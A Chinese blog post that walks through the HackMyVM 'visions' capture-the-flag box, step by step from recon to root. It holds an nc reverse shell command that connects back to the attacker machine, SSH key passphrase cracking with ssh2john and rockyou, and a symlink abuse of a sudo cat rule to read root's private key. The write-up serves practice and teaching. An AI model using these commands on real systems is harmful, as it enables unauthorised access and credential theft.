当前位置:网站首页>HackMyvm靶机系列(3)-visions
HackMyvm靶机系列(3)-visions
2022-07-06 09:22:00 【月应知我意】
一、信息收集
先探测网段,得到目标主机
nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox
然后进行端口扫描,发现ssh服务和http服务
nmap -sC -sV -p- 192.168.200.234
访问一下http服务,发现只有一张图片和一段注释。
这段注释看上去是一个提示,aliccia猜测可能是一个用户
使用dirsearch扫描一下目录,看看能有什么收获不
dirsearch -u http://192.168.200.234/ -e php,html,txt,bak,zip,7z,gz,db -x 404,301,500,502
然而什么东西都么有
根据它的提示,将图片下载下来,查看一下图片的元数据是啥
curl http://192.168.200.234/white.png -o white.png
./exiftool white.png
如图,发现了密码
工具用法与下载:
alicia:ihaveadream
二、漏洞利用
成功登入
进来之后在当前目录下没发现flag,看了一下家目录发现有4个用户,然后在sophia目录下发现了flag,但是没有权限,运行不了。
那就先试试提权?
sudo -l
发现当前用户可以以emma用户的身份运行nc而不需要使用密码。
既然如此,那就先反弹shell试试。
kali上监听端口
然后在目标机上执行下面命语句
sudo -u emma nc 192.168.200.192 10000 -e /bin/bash
成功接受到shell,使用python获得一个交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
在当前目录下发现一个note.txt文件,内容如下。
我情不自禁???不知道啥意思。
然后我又查看了一下suid和sudo提权,都没啥突破口。
后来看了大佬的wp,发现需要使用到一些图片处理工具
上传图片后,点击这个箭头处。
然后就能看到用户名和密码了,这题是真的坑,信息全藏在这张图片里了
sophia:seemstobeimpossible
登录成功
当前用户可以使用任何用户的身份使用cat命令查看.invisible文件。这意味着我们使用cat命令查看该文件的时候可以用拥有root权限。
打开一看,是用户isabella的私钥欸,拿去登录试试
居然还要继续输入密码。
只能开始爆破了
可以使用john the ripper进行爆破,但是要先使用下面命令将id_rsa转换为john能识别的hash值
python3 /usr/share/john/ssh2john.py id_rsa > crack.txt
我这里使用脚本进行爆破。
rockyou.txt是kali自带的一个字典,/usr/share/wordlists/rockyou.txt.gz,使用之前需要对其解压,不然会乱码
gzip -d rockyou.txt.gz
成功爆破出密码(密码在1万多行,但是这里由于写wp我就把它放前面来了)
invisible
如图,登录成功
从下面开始,由于换了一个网络,所以这个IP变了
三、权限提升
在这里看看有没有可以用来提权的命令
然而并没有什么突破点
后来突然想起之前sophia用户使用cat命令读取.invisible文件是具有root权限的,那我能不能使用isabella用户将.invisiblla用户链接到root用户的私钥上去呢?
创建软链接
ln -sf /root/.ssh/id_rsa .invisible
读取root用户的私钥
sudo cat /home/isabella/.invisible
这里使用私钥登录是会有一个小问题,权限太高会导致登陆失败。
将权限降低,再进行登录
chmod 600 key
登录成功,获得root权限
边栏推荐
- 简单理解ES6的Promise
- 仿牛客技术博客项目常见问题及解答(一)
- 实验四 数组
- Safe driving skills on ice and snow roads
- 强化学习基础记录
- ABA问题遇到过吗,详细说以下,如何避免ABA问题
- Zatan 0516
- String ABC = new string ("ABC"), how many objects are created
- [experiment index of educator database]
- Thoroughly understand LRU algorithm - explain 146 questions in detail and eliminate LRU cache in redis
猜你喜欢
随机推荐
Strengthen basic learning records
Have you encountered ABA problems? Let's talk about the following in detail, how to avoid ABA problems
Write a program to simulate the traffic lights in real life.
Package bedding of components
Inaki Ading
Redis实现分布式锁原理详解
This time, thoroughly understand the MySQL index
js判断对象是否是数组的几种方式
[modern Chinese history] Chapter V test
7-3 construction hash table (PTA program design)
Detailed explanation of redis' distributed lock principle
Miscellaneous talk on May 27
Brief introduction to XHR - basic use of XHR
深度强化文献阅读系列(一):Courier routing and assignment for food delivery service using reinforcement learning
【数据库 三大范式】一看就懂
[VMware abnormal problems] problem analysis & Solutions
[the Nine Yang Manual] 2021 Fudan University Applied Statistics real problem + analysis
透彻理解LRU算法——详解力扣146题及Redis中LRU缓存淘汰
Get started with typescript
Differences among fianl, finally, and finalize